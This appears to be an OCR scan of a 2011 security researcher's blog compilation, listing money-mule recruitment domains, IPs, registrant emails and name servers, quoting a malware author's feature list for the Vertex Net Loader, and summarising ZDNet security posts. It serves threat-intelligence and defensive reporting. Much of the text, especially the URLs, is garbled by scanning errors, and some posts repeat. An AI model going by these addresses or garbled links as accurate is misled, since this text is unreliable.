nsl.mamacholi.net - 208.110.80.35 - Email: 
excess@bigmailbox.ru 

ns2.mamacholi.net - 64.85.169.71 

ns3.mamacholi.net - 173.208.132.43 

nsl.rjevski.com - 208.110.80.34 - Email: 
low@bigmailbox.ru 
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ns2.rjevski.com - 64.85.169.70 

ns3.rjevski.com - 173.208.132.42 

nsl.runlesrun.ee - 208.110.80.37 - Email: 
frost@bigmailbox.ru 

ns2.runlesrun.ee - 64.85.169.73 

ns3.runlesrun.ee - 173.208.132.45 

nsl.skotinko.net - 208.110.80.38 - Email: 
info@dnregistrar.ru 



ns2.skotinko.net - 64.85.169.74 

ns3.skotinko.net - 173.208.132.46 

nsl.solojumper.com - 208.110.80.36 - Email: 
cri me@bigmailbox.ru 

ns2.solojumper.com - 64.85.169.72 

ns3.solojumper.com - 173.208.132.44 

Monitoring of money mule recruitment campaigns is 
ongoing. 

Related posts: 

[1] Keeping Money Mule Recruiters on a Short Leash - Part 
Seven 

[2] Keeping Money Mule Recruiters on a Short Leash - Part 
Six 

[3] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[4] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[5] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[6] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[7] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 


[8]Money Mule Recruiters on Yahool's Web Hosting 



[9] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[10] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[11] Keeping Reshipping Mule Recruiters on a Short Leash 

[12] Keeping Money Mule Recruiters on a Short Leash 

[13] Standardizing the Money Mule Recruitment Process 

[14] lnside a Money Laundering Group's Spamming 
Operations 

[15] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[16] Money Mules Syndicate Actively Recruiting Since 2002 
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A Peek Inside the Vertex Net Loader (2011-05-26 
16:34) 

It appears that the author of the of the DarkComet RAT has 
been keeping himself rather busy. 

In early-stage development (currently in BETA), the Vertex 
Net Loader is your typical web-based command 

and control malware loader, worth keeping an eye on. 

More details: 

Info on the loader: 

This is the small program that will send/retrieve info from/to 
the web panel, it is like the server part of a RAT. The loader 
is coded in C++. Size unpacked is 100kb , compressed is 
very small and still stable. I choose C++ as the language for 
this project cause i code C++ since a long time but i never 
release some security soft, so as a friend said it is a shame 
to have a knowledge in C++ and don't use it instead of 
Delphi all the time. Also C++ is faster and more stable than 
any other language. 

Features of the loader: 

- Send message box 

- Execute any kind of commands 

- close loader process 

- Download files and execute them 

- Get the process list 


- Get the modules list from PID 


- Set the key logger status ON/OFF 

- Retrieve the key logger logs 

- Read the file content and retrieve it 

- Uninstall the loader 

- Flttpflood same technologies as i used for DarkComet that 
is very powerful! 

- Remote shell 
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- Visit any webpage 

Upcoming features: 

- FWB 

- More commands 

- Panel Installer 

- More possibilities in the webpanel 

- User manager in the panel 

- Plugins support 

- and more. 
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Monitoring of Vertex Net Loader's development is ongoing. 
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A Peek Inside the Vertex Net Loader (2011-05-26 
16:34) 

It appears that the author of the of the DarkComet RAT has 
been keeping himself rather busy. 

In early-stage development (currently in BETA), the Vertex 
Net Loader is your typical web-based command 

and control malware loader, worth keeping an eye on. 

More details: 

Info on the loader: 

This is the small program that will send/retrieve info from/to 
the web panel, it is like the server part of a RAT. The loader 
is coded in C++. Size unpacked is 100kb , compressed is 
very small and still stable. I choose C++ as the language for 
this project cause i code C++ since a long time but i never 
release some security soft, so as a friend said it is a shame 
to have a knowledge in C++ and don't use it instead of 
Delphi all the time. Also C++ is faster and more stable than 
any other language. 

Features of the loader: 

- Send message box 

- Execute any kind of commands 

- dose loader process 

- Download files and execute them 

- Get the process list 


- Get the modules list from PID 



- Set the key logger status ON/OFF 

- Retrieve the key logger logs 

- Read the file content and retrieve it 

- Uninstall the loader 

- Flttpflood same technologies as i used for DarkComet that 
is very powerful! 

- Remote shell 
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- Visit any webpage 

Upcoming features: 

- FWB 

- More commands 

- Panel Installer 

- More possibilities in the webpanel 

- User manager in the panel 

- Plugins support 

- and more. 
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Monitoring of Vertex Net Loader's development is ongoing. 
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The following brief summarizes currently active money mule 
recruitment web sites, actively recruiting money mules 

for the processing of fraudulently obtained funds. 

Currently active sites residing within AS42708, PORTLANE 
Network www.portlane.com; AS29713, INTERPLEX- 

INC Interplex LLC; AS38913, Enter-Net-Team-AS; AS24940, 
HETZNER-AS Hetzner Online: 

ATLANTALTD-UK.CC - 193.105.134.233 

ATLANTA-LTD-UK.NET - 78.46.105.205 - Email: 
admin@atlanta-ltd-uk.net 

3ATLANTA-UK.COM - 193.105.134.233 

BLITZNET-GROUPINC.CC - 78.46.105.205 - Email: 
admin@derwart-group.at 

5DALI-STYLE.COM - 98.141.220.117 

DALISTYLE-GROUP.CC - 98.141.220.118 - Email: 
tolls@mailti.com 

DERWOODE-GROUP.COM - 98.141.220.117 

DERWOODE-GROUP.NET - 98.141.220.117 

GLACIS-GROUPLLC.COM - 193.105.134.232 

lGLACISGROUP-LLC.NET - 193.105.134.233 

IT-AMIRA.NET - 86.55.210.3 - Email: support@it-amira.net 

ITAMIRA-DE.COM - 86.55.210.6 - Email: admin@itamira- 
de.com 



ITSERV-DE.CO - 78.46.105.205 - Email: admin@itserv- 
de.co 

IT-SERVICELTD.BE - 78.46.105.205 

KADE-GROUP.COM - 86.55.210.4 - Email: admin@kade- 
group.com 

MASTERART-GROUP.COM - 98.141.220.116 - Email: 
east@maill3.com 

MENDRYLTD.COM - 98.141.220.117 - Email: 
admin@mendryltd.com 

MENZEL-GROUP.TV - 98.141.220.118 - Email: 
admin@devotion-company.com 

MITISSANSERVICE-GROUP-LTD.CC - 98.141.220.117 - 
Email: berra@cutemail.org 

MITISSANSERVICEGROUP-LTD.COM - 98.141.220.117 - 
Email: alibi@mailae.com 
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oregonltd-uk.cc - 86.55.210.5 - Email: cause@ca4.ru 

PARLEN-GROUPLLC.COM - 98.141.220.118 - Email: 
admin@parlen-groupllc.com 

PARLENGROUPLLC.NET - 98.141.220.114 

PARLEN-GROUP-USA.COM - 98.141.220.118 

quad-groupuk.cc - 86.55.210.6 - Email: 
prissy@mailae.com 



QUAD-GROUPUK.CC - 86.55.210.6 - Email: 
prissy@mailae.com 

QUAD-IT-GROUP.COM - 193.105.134.232 - Email: 
admin@quad-it-group.com 

QUINTAGROUP.CC - 98.141.220.117 - Email: 
cola@mailae.com 

QUINTA-GROUPUS.eOM - 98.141.220.118 - Email: 
admin@quinta-groupus.com 

QUINTA-LLC.NET - 98.141.220.118 - Email: 
admin@quinta-llc.net 

REXTECHINNOVATION.COM - 98.141.220.118 - Email 
admin@rextechinnovation.com 

REXTECHLTD.CC - 98.141.220.115 - Email: 
blurt@fxmail.net 

REXTECHLTD-US.COM - 98.141.220.118 - Email: 
admin@rextechltd-us.com 

SPECIAL-ART-LTD.COM - 193.105.134.233 - Email: 
admin@special-art-ltd.com 

SPECIAL-ART-UK.CC - 193.105.134.234 

SUBLIME-LTD.NET - 98.141.220.118 - Email: 
admin@sublime-ltd.net 

TARGETMARKETGROUP-LLC.CC - 98.141.220.117 - 
Email: admin@targetmarketgroup-llc.cc 

TAZPROGLTD-US.COM - 98.141.220.117 - Email: 
admin@tazprogltd-us.co 



VNSPROiECT-DE.CC - 78.46.105.205 - Email: 
admin@vnsproject-de.cc 

VORTEXLLC-UK.COM - 193.105.134.232 - Email: 
admin@vortexllc-uk.com 

VORTEX-LLC-UK.NET - 193.105.134.230 - Email: 
admin@vortex-llc-uk.net 
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Name servers of notice: 

NS1.NAMESUKNS.CC - 178.162.172.48 - Email: 
pal@bz3.ru 

NS2.NAMESUKNS.CC - 69.10.56.131 

NS3.NAMESUKNS.CC - 66.199.229.123 

NS1.NAMEUK.AT - 178.162.172.57 - Email: 
admin@nameuk.at 

NS2.NAMEUK.AT - 69.10.56.132 

NS3.NAMEUK.AT - 66.199.229.124 

NS1.UKDNSTART.NET - 178.162.172.40 - Email: 
admin@ukdnstart.net 

NS2.UKDNSTART.NET - 69.10.56.130 

NS3.UKDNSTART.NET - 66.199.229.122 

NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp. 

NS2.DNSUS.SU - 87.118.81.7 


159 


NS3.DNSUS.SU - 87.118.81.10 

NS1.NAMEUSNS.SU - 217.23.15.138 - Email: 
Iavier@bz3.ru 

NS2.NAMEUSNS.SU - 84.19.161.7 

NS3.NAMEUSNS.SU - 84.19.161.10 

NS1.USDENNS.SU - 217.23.15.136 - Email: lipstick@free- 
id.ru 

NS2.USDENNS.SU - 84.19.161.7 

NS3.USDENNS.SU - 84.19.161.10 

Monitoring of money mule recruitment campaigns is 
ongoing. 

Related posts: 
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Seven 
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Six 
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Five 
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Four 
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Three 
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Campaign 

[11] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[12] Keeping Reshipping Mule Recruiters on a Short Leash 

[13] Keeping Money Mule Recruiters on a Short Leash 

[14] Standardizing the Money Mule Recruitment Process 

[15] Inside a Money Laundering Group's Spamming 
Operations 
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Services 

[17] Money Mules Syndicate Actively Recruiting Since 2002 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Nine (2011-05-30 12:09) 

The following brief summarizes currently active money mule 
recruitment web sites, actively recruiting money mules 

for the processing of fraudulently obtained funds. 

Currently active sites residing within AS42708, PORTLANE 
Network www.portlane.com; AS29713, INTERPLEX- 

INC Interplex LLC; AS38913, Enter-Net-Team-AS; AS24940, 
HETZNER-AS Hetzner Online: 

ATLANTALTD-UK.CC - 193.105.134.233 

ATLANTA-LTD-UK.NET - 78.46.105.205 - Email: 
admin@atlanta-ltd-uk.net 

3ATLANTA-UK.COM - 193.105.134.233 




















BLITZNET-GROUPINC.CC - 78.46.105.205 - Email: 
admin@derwart-group.at 

5DALI-STYLE.COM - 98.141.220.117 

DALISTYLE-GROUP.CC - 98.141.220.118 - Email: 
tolls@mailti.com 

DERWOODE-GROUP.COM - 98.141.220.117 

DERWOODE-GROUP.NET - 98.141.220.117 

GLACIS-GROUPLLC.COM - 193.105.134.232 

lGLACISGROUP-LLC.NET - 193.105.134.233 

IT-AMIRA.NET - 86.55.210.3 - Email: support@it-amira.net 

ITAMIRA-DE.COM - 86.55.210.6 - Email: admin@itamira- 
de.com 

ITSERV-DE.CO - 78.46.105.205 - Email: admin@itserv- 
de.co 

IT-SERVICELTD.BE - 78.46.105.205 

KADE-GROUP.COM - 86.55.210.4 - Email: admin@kade- 
group.com 

MASTERART-GROUP.COM - 98.141.220.116 - Email: 
east@maill3.com 

MENDRYLTD.COM - 98.141.220.117 - Email: 
admin@mendryltd.com 

MENZEL-GROUP.TV - 98.141.220.118 - Email: 
admin@devotion-company.com 



MITISSANSERVICE-GROUP-LTD.CC - 98.141.220.117 - 
Email: berra@cutemail.org 

MITISSANSERVICEGROUP-LTD.COM - 98.141.220.117 - 
Email: alibi@mailae.com 
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oregonltd-uk.cc - 86.55.210.5 - Email: cause@ca4.ru 

PARLEN-GROUPLLC.COM - 98.141.220.118 - Email: 
admin@parlen-groupllc.com 

PARLENGROUPLLC.NET - 98.141.220.114 

PARLEN-GROUP-USA.COM - 98.141.220.118 

quad-groupuk.cc - 86.55.210.6 - Email: 
prissy@mailae.com 

QUAD-GROUPUK.CC - 86.55.210.6 - Email: 
prissy@mailae.com 

QUAD-IT-GROUP.COM - 193.105.134.232 - Email: 
admin@quad-it-group.com 

QUINTAGROUP.CC - 98.141.220.117 - Email: 
cola@mailae.com 

QUINTA-GROUPUS.COM - 98.141.220.118 - Email: 
admin@quinta-groupus.com 

QUINTA-LLC.NET - 98.141.220.118 - Email: 
admin@quinta-llc.net 

REXTECHINNOVATION.COM - 98.141.220.118 - Email: 
admin@rextechinnovation.com 



REXTECHLTD.CC - 98.141.220.115 - Email: 
blurt@fxmail.net 

REXTECHLTD-US.COM - 98.141.220.118 - Email: 
admin@rextechltd-us.com 

SPECIAL-ART-LTD.COM - 193.105.134.233 - Email: 
admin@special-art-ltd.com 

SPECIAL-ART-UK.CC - 193.105.134.234 

SUBLIME-LTD.NET - 98.141.220.118 - Email: 
admin@sublime-ltd.net 

TARGETMARKETGROUP-LLC.CC - 98.141.220.117 - 
Email: admin@targetmarketgroup-llc.cc 

TAZPROGLTD-US.COM - 98.141.220.117 - Email: 
admin@tazprogltd-us.co 

VNSPROJECT-DE.CC - 78.46.105.205 - Email: 
admin@vnsproject-de.cc 

VORTEXLLC-UK.COM - 193.105.134.232 - Email: 
admin@vortexllc-uk.com 

VORTEX-LLC-UK.NET - 193.105.134.230 - Email: 
admin@vortex-llc-uk.net 
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Name servers of notice: 

NS1.NAMESUKNS.CC - 178.162.172.48 - Email: 
pal@bz3.ru 


NS2.NAMESUKNS.CC - 69.10.56.131 


NS3.NAMESUKNS.CC 66.199.229.123 

NS1.NAMEUK.AT - 178.162.172.57 - Email: 
admin@nameuk.at 

NS2.NAMEUK.AT - 69.10.56.132 

NS3.NAMEUK.AT - 66.199.229.124 

NS1.UKDNSTART.NET - 178.162.172.40 - Email: 
admin@ukdnstart.net 

NS2.UKDNSTART.NET - 69.10.56.130 

NS3.UKDNSTART.NET - 66.199.229.122 

NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp.ru 

NS2.DNSUS.SU - 87.118.81.7 
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NS3.DNSUS.SU - 87.118.81.10 

NS1.NAMEUSNS.SU - 217.23.15.138 - Email: 
Iavier@bz3.ru 

NS2.NAMEUSNS.SU - 84.19.161.7 

NS3.NAMEUSNS.SU - 84.19.161.10 

NS1.USDENNS.SU - 217.23.15.136 - Email: Iipstick@free- 
id.ru 


NS2.USDENNS.SU - 84.19.161.7 



NS3.USDENNS.SU - 84.19.161.10 


Monitoring of money mule recruitment campaigns is 
ongoing. 
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8. http://ddanchev.blo as pot.com/2Q10/Q3/keepin a -mone v- 
mule-recruiters-on-short.html 

9. http://ddanchev.blo as pot.com/201Q/Q3/monev-mule- 
recruiters-on-vahoos-web.html 

10. http://ddanchev.blo as pot.com/201Q/Q2/dissectin a- 
ona oin a -monev-mule.html 

11. http://ddanchev.blo as pot.com/2QlQ/Q2/keepin a -mone v- 
mule-recruiters-on-short.html 


12. http://ddanchev.blo as pot.com/2QQ9/12/keepin a- 
reshi p pin a -mule-recruiters-on.html 

13. http://ddanchev.blo as pot.com/2QQ9/ll/keepin a -mone v- 
mule-recruiters-on-short.html 


14. http://ddanchev.blo as pot.com/2QQ9/lQ/standardizin a- 
monev-mule-recruitment.html 

15. http://ddanchev.blo as pot.com/2QQ9/Q5/inside-mone v- 
launderin a-a roups-spammin a .html 

16. http://ddanchev.blo as pot.com/2QQ8/Q7/monev-mule- 
recruiters-use-asproxs-fast.html 

17. http://ddanchev.blo as pot.com/2QQ8/lQ/monev-mules- 
s vndicate-activelv.html 
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18. http://ddanchev.blo as pot.com/ 
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Summarizing ZDNet's Zero Day Posts for May (2011- 
06-08 16:24) 

The following is a brief summary of all of my posts at 
ZDNet's Zero Day for May. You can subscribe to my 

[ljpersonal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 
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Recommended reading: 

• [3] China's Blue Army: When nations harness hacktivists 
for information warfare 

01. [4]Vishing attack on Skype pushing scareware 

02. [5]Commtouch: 71 percent increase in new zombies 

03. [6]Osama execution video scam spreading on Facebook 

04. [7]New MAC OS X scareware delivered through blackhat 
SEO 

05. [8]'You visit illegal websites' FBI-themed emails lead to 
scareware 

06. [9]Fake Microsoft Patch Tuesday emails lead to ZeuS 
crimeware 

07. [10]'Enable Dislike Button' scam spreading on Facebook 


08. [ll]NASA's Goddard Space Flight Center FTP server 
hacked 

09. [12]'Checkout Your PROFILE Stalkers' scam spreading 
on Facebook 

10. [13]'The World Funniest Condom Commercial - LOL' 
scam spreading on Facebook 

11. [14]China's Blue Army: When nations harness 
hacktivists for information warfare 

This post has been reproduced from [15]Dancho 
Danchev's blog. Follow him [16]on Twitter. 

1. http://www.zdnet-com/tooics/dancho+danchev? 
o-l&mode=rss&ta a = mantle skin : content 

2. http://feeds.feedburner.com/zdnet/securit v 

3. http://www.zdnet.com/blo a /securitv/chinas-blue-arm v- 
when-nations-harness-hacktivists-for-information-warf 


are-/8686 

4. http://www.zdnet.com/blo a /securitv/vishin a -attack-on- 
sky. Q£z pushin g -scareware/8598 

5. http://www.zdnet.com/blo a /securitv/commtouch-71- 
percent-increase-in-new-zombies/8602 

6. http://www.zdnet.com/blo a /securitv/osama-execution- 
videQ-scam-spreadin a -on-facebook/8607 


7. http://www.zdnet.com/blo a /securitv/new-mac-os-x- 
scareware-delivered-throu a h-blackhat-seo/8614 


































8. http://www.zdnet.com/blo a /securit v/ vou-visit-ille a al- 
websites-fbi-themed-emails-lead-to-scareware/8618 

9. http://www.zdnet.com/blo a /securitv/fake-microsoft-patch- 
tuesdav-emails-lead-to-zeus-crimeware/8646 

10. http://www.zdnet.com/blo a /securitv/enable-dislike- 
button-scam-spreadin a -on-facebook/8655 

11. http://www.zdnet.com/blo a /securitv/nasas- a oddard- 
s pace-fli a ht-center-ftp-server-hacked/8660 

12. http://www.zdnet.com/blo a /securitv/checkout-vour- 
profile-stalkers-scam-spreadin a -on-facebook/8665 

13. http://www.zdnet.com/blo a /securitv/the-world-funniest- 
condom-commercial-lol-scam-spreadin a -on-facebook/86 

80 

14. http://www.zdnet.com/blo a /securitv/chinas-blue-arm v- 
when-nations-harness-hacktivists-for-information-warf 


are-/8686 

15. http://ddanchev.blo as pot.com/ 

16. http://twitter.com/danchodanchev 
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Summarizing ZDNet's Zero Day Posts for June (2011- 
07-07 12:24) 

The following is a brief summary of all of my posts at 
ZDNet's Zero Day for June. You can subscribe to my 

[ljpersonal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 

01. [3]'Hot Lesbian Video - Rihanna and Hayden Panettiere' 
scam on Facebook leads to Mac malware 

02. [4]Sony Europe hacked by Lebanese grey hat hacker 

03. [5]Spamvertised United Parcel Service emails lead to 
scareware 

04. [6]The most common iPhone passcodes 

05. [7]AutoRun malware infections declining 

06. [8]'McDonald's Free Dinner Day' emails lead to 
scareware 

07. [9]Two DDoS attacks hit Network Solutions 
171 

08. [lOJ'The Creator of LulzSec arrested in London' scam 
spreading on Facebook 

09. [llJFederal Reserve themed emails lead to ZeuS 
crimeware 

10. [12]'Photographer commited SUICIDE 3 days after 
shooting THIS video!' scam spreading on Facebook 


This post has been reproduced from [13]Dancho 
Danchev's blog. Follow him [14]on Twitter. 

1. http://www.zdnet.com/toDics/dancho+danchev? 
o=l&mode=rss&ta a = mantle_skin : content 

2. http://feeds.feedburner.com/zdnet/securit v 

3. http://www.zdnet.com/blo a /securitv/hot-lesbian-video- 
rihanna-and-havden-panettiere-scam-on-facebook-ieads 

-to-mac-malware/8717 

4. http://www.zdnet.com/blo a /securitv/sonv-europe-hacked- 
b v-lebanese- are v-hat-hacker-/8725 

5. http://www.zdnet.com/blo a /securit v/s pamvertised-united- 
parcel-service-emails-lead-to-scareware/8745 

6. http://www.zdnet.com/blo a /securitv/the-most-common- 
i phone-passcodes/8760 

7. http://www.zdnet.com/blo a /securitv/autorun-malware- 
infections-decl inin a /8772 

8. http://www.zdnet.com/blo a /securitv/mcdonalds-free- 
dinner-dav-emails-lead-to-scareware/8848 

9. http://www.zdnet.com/blo a /securitv/two-ddos-attacks-hit- 
network-solutions/8852 

10. http://www.zdnet.com/blo a /securitv/the-creator-of- 
lulzsec-arrested-in-london-scam-spreadin a -on-facebook/8 

856 


11. http://www.zdnet.com/blo a /securitv/federal-reserve- 
themed-emails-lead-to-zeus-crimeware/8862 
























































12. http://www.zdnet.com/blo a /securit v/ photo ara oher- 
commited-suicide-3-davs-after-shootin a -this-video-scam-s o 

readin a -on-facebook/8911 

13. http://ddanchev.blo as oot.com/ 

14. http://twitter.com/danchodanchev 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Ten (2011-07-07 13:25) 

The following intelligence brief is part of the [l]Keeping 
Money Mule Recruiters on a Short Leash series. In it, 

I'll expose currently active money mule recruitment 
domains, their domain registration details, currently 
responding 

IPs, and related ASs. 

Currently active money mule recruitment domains: 

ACWOODE-GROUP.COM - 184.168.64.173 - Email: 
admin@acwoode-group.com 

ACWOODE-GROUP.NET - 184.168.64.173 - Email: 
admin@acwoode-group.net 

ART-GROUPINTEGRETED.COM - 78.46.105.205 - Email: 
admin@art-groupintegreted.com 

ARTINTEGRATED-GROUP.NET - 78.46.105.205 - Email: 
crony@cutemail.org 














COMPLETE-ART-GROUP-LTD.COM - 193.105.134.233 - 
Email: saps@cutemail.org 

COMPLETE-ART-UK.NET - 193.105.134.232 - Email: 
admin@complete-art-uk.net 

CONDORLLC-UK.COM - 193.105.134.231 - Email: 
plods@fxmail.net 

CONDOR-LLC-UK.NET - 193.105.134.233 - Email: 
admin@condor-llc-uk.net 

CONTEMP-USAINC.COM - 184.168.64.173 - Email: 
admin@contemp-usainc.com 

CONTEMP-USGROUP.COM - 184.168.64.173 - Email: 
admin@contemp-usgroup.com 

DE-KADEGROUP.CC - 193.105.134.230 - Email: 
cents@mailae.com 

DERWOODE-GROUP.CC - 98.141.220.115 - Email: 
web@derwoode-group.cc 

ELENTY-CO.NET - 184.168.64.173 - Email: 
abcs@mailti.com 

ELENTY-LLC.COM - 184.168.64.173 - Email: 
admin@elenty-llc.com 

GAPSONART.NET - 184.168.64.173 - Email: 
admin@gapsonart.net 

GLACIS-GROUPUK.NET - 78.46.105.205 - Email: 
admin@glacis-groupuk.net 

GURU-GROUP.CC - 184.168.64.173 - Email: admin@guru- 
group.cc 



GURU-GROUP.NET - 184.168.64.173 - Email: 
jj@cutemail.org 

INTECHTODEX-GROUP.COM - 184.168.64.173 - Email: 
uq@maill3.com 

INTEGRATED-EUROPE-IT.NET - 78.46.105.205 - Email: 
admin@integrated-europe-it.net 
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ITAGROUP-USA.NET - 98.141.220.117 - Email: 
admin@itagroup-usa.net 

IT-ANALISYS.COM - 98.141.220.115 - Email: 
yea@mailae.com 

ITANALYSISGROUP.NET - 98.141.220.116 - Email: 
admin@itanalysisgroup.net 

KADE-GROUPDE.NET - 78.46.105.205 - Email: 
zigzag@fxmail.net 

MASTERARTUSA.COM - 98.141.220.114 - Email: 
day@mailae.com 

NARTEN-ART.COM - 209.190.4.91 - Email: 
glamor@fxmail.net 

NARTENART.NET - 209.190.4.91 - Email: 
admin@nartenart.net 

quad-groupuk.cc - 78.46.105.205 - Email: 
prissy@mailae.com 

REFINEMENT-ANTIQUE.COM - 184.168.64.173 - Email 
xe@fxmail.net 



SCAR-BEIINC.COM - 184.168.64.173 - Email: admin@scar- 
beiinc.com 


SKYLINE-ANTIQUE.COM - 209.190.4.91 - Email: 
blurs@mailae.com 

SKYLINE-LTD.NET - 209.190.4.91 - Email: admin@skyline- 
ltd.net 

SMARTLLC-UK.COM - 193.105.134.234 - Email: 
admin@smartllc-uk.com 

SMART-LLC-UK.NET - 193.105.134.233 - Email: 
pol@mailae.com 

SPECIAL-ARTUK.COM - 193.105.134.232 - Email: 
admin@special-artuk.com 

SUBLIMELTD.COM - 98.141.220.118 - Email: 
admin@sublimeltd.com 

TODEX-GROUP.NET - 184.168.64.173 - Email: 
admin@todex-group.net 
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The domains reside within the following ASs: AS10297, 
RoadRunner RR-RC; AS42708; PORTLANE Network; 
AS26496; 

GODADDY.com; AS29713, INTERPLEXINC; AS24940, 
HETZNER-AS Hetzner Online. 


Name servers of notice: 


NS1.MKNS.SU - 85.25.250.244 - Email: 
mkns@cheapbox.ru 

NS2.MKNS.SU -46.4.148.119 

NS3.MKNS.SU - 184.82.158.76 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 

NS2.MLDNS.SU -46.4.148.74 

NS3.MLDNS.SU - 184.82.158.74 

NS1.MNAMEDL.SU - 85.25.250.211 - Email: 
mnamed@yourisp.ru 

NS2.MNAMEDL.SU - 46.4.148.118 

NS3.MNAMEDL.SU - 184.82.158.75 

NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp.ru 

NS2.DNSUS.SU - 87.118.81.7 
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NS3.DNSUS.SU - 87.118.81.10 

NS1.NAMEUSNS.SU - 217.23.15.138 - Email: 
Iavier@bz3.ru 

NS2.NAMEUSNS.SU - 84.19.161.7 

NS3.NAMEUSNS.SU - 84.19.161.10 

NS1.USDENNS.SU - 217.23.15.136 - Email: lipstick@free- 
id.ru 



NS2.USDENNS.SU - 84.19.161.7 


NS3.USDENNS.SU - 84.19.161.10 

NS1.NAMESUKNS.CC - 86.55.210.4 - Email: pal@bz3.ru 

NS2.NAMESUKNS.CC - 193.105.134.232 

NS3.NAMESUKNS.CC - 193.105.134.237 

NS1.NAMEUK.AT - 86.55.210.5 - Email: admin@nameuk.at 

NS2.NAMEUK.AT - 193.105.134.233 

NS3.NAMEUK.AT - 193.105.134.236 

NS1.UKDNSTART.NET - 86.55.210.5 - Email: 
admin@ukdnstart.net 

NS2.UKDNSTART.NET - 193.105.134.233 

NS3.UKDNSTART.NET - 193.105.134.236 

NSl.DENDRUYOS.NET - 86.55.210.4 - Email: 
admin@dendruyos.net 

NS2.DENDRUYOS.NET - 193.105.134.232 



NS3.DENDRUYOS.NET - 193.105.134.237 


NS1.DEDNSAUTH.NET 86.55.210.2 - Email: 
admin@dednsauth.net 

NS2.DEDNSAUTH.NET 193.105.134.230 

NS3.DEDNSAUTH.NET 193.105.134.239 

NS1.DELTOPOOR.AT - 86.55.210.3 - Email: 
admin@deltopoor.at 

NS2.DELTOPOOR.AT - 193.105.134.231 

NS3.DELTOPOOR.AT - 193.105.134.238 

Monitoring of ongoing money mule recruitment campaigns is 
ongoing. 

Related posts: 

[2] Keeping Money Mule Recruiters on a Short Leash - Part 
Nine 

[3] Keeping Money Mule Recruiters on a Short Leash - Part 
Eight - Historical OSINT 

[4] Keeping Money Mule Recruiters on a Short Leash - Part 
Seven 

[5] Keeping Money Mule Recruiters on a Short Leash - Part Six 

[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[7] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 



[8] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[9] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[10] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[11] Money Mule Recruiters on Yahool's Web Hosting 

[12] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[13] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[14] Keeping Reshipping Mule Recruiters on a Short Leash 

[15] Keeping Money Mule Recruiters on a Short Leash 

[16] Standardizing the Money Mule Recruitment Process 

[17] lnside a Money Laundering Group's Spamming 
Operations 

[18] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[19] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [20]Dancho 
Danchev's blog. 
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1. http://ddanchev.blo as pot.com/2011/05/keepin a -mone v- 
mule-recruiters-on-short 30.html 






2. http://ddanchev.blo as pot.com/2011/05/keeoin a -mone v- 
mule-recruiters-on-short_30.html 

3. http://ddanchev.blo as pot.com/2011/05/keeoin a -mone v- 
mule-recruiters-on-short_25.html 

4. http://ddanchev.blo as pot.com/2011/05/keepin a -mone v- 
mule-recruiters-on-short.html 

5. http://ddanchev.blo as pot.com/2011/03/keepin a -mone v- 
mule-recruiters-on-short.html 

6. http://ddanchev.blo as pot.com/2011/01/keeoin a -mone v- 
muie-recruiiters-on-short.html 

7. http://ddanchev.blo as pot.com/2010/Q4/dns-infrastructure- 
of-monev-mule.html 

8. http://ddanchev.blo as pot.com/2010/04/keeoin a -mone v- 
mule-recruiters-on-short.html 


9. http://ddanchev.blo as pot.com/2010/Q3/monev-mule- 
recruifment-camoai a n-servin a .html 

10. http://ddanchev.blo as pot.com/2010/03/keeoin a -mone v- 
mule-recruiters-on-short.html 


11. http://ddanchev.blo as pot.com/2010/Q3/monev-mule- 
recruiters-on-vahoos-web.html 

12. http://ddanchev.blo as pot.com/2010/Q2/dissectin a- 
on a oin a -monev-mule.html 

13. http://ddanchev.blo as pot.com/2010/02/keeoin a -mone v- 
mule-recruiters-on-short.html 


14. http://ddanchev.blo as pot.com/2009/12/keeoin a- 
reshi o pin a -mule-recruiters-on.html 

























































15. http://ddanchev.blo as pot.com/2009/ll/keeoin a -mone v- 
mule-recruiters-on-short.html 


16. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 

17. http://ddanchev.blo as pot.com/2009/05/inside-mone v- 
launderin a-a roups-spammin a .html 

18. http://ddanchev.blo as pot.com/2008/Q7/monev-mule- 
recruiters-use-asoroxs-fast.html 

19. http://ddanchev.blo as pot.com/2008/10/monev-mules- 
s vndicate-activelv.html 

20. http://ddanchev.blo as oot.com/ 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Ten (2011-07-07 13:25) 

The following intelligence brief is part of the [l]Keeping 
Money Mule Recruiters on a Short Leash series. In it, 

I'll expose currently active money mule recruitment domains, 
their domain registration details, currently responding 

IPs, and related ASs. 

Currently active money mule recruitment domains: 

ACWOODE-GROUP.COM - 184.168.64.173 - Email: 
admin@acwoode-group.com 

ACWOODE-GROUP.NET - 184.168.64.173 - Email: 
admin@acwoode-group.net 

ART-GROUPINTEGRETED.COM - 78.46.105.205 Email: 
admin@art-groupintegreted.com 

ARTINTEGRATED-GROUP.NET - 78.46.105.205 - Email: 
crony@cutemail.org 

COMPLETE-ART-GROUP-LTD.COM - 193.105.134.233 - 
Email: saps@cutemail.org 

COMPLETE-ART-UK.NET - 193.105.134.232 - Email: 
admin@complete-art-uk.net 

CONDORLLC-UK.COM - 193.105.134.231 - Email: 
plods@fxmail.net 

CONDOR-LLC-UK.NET - 193.105.134.233 - Email: 
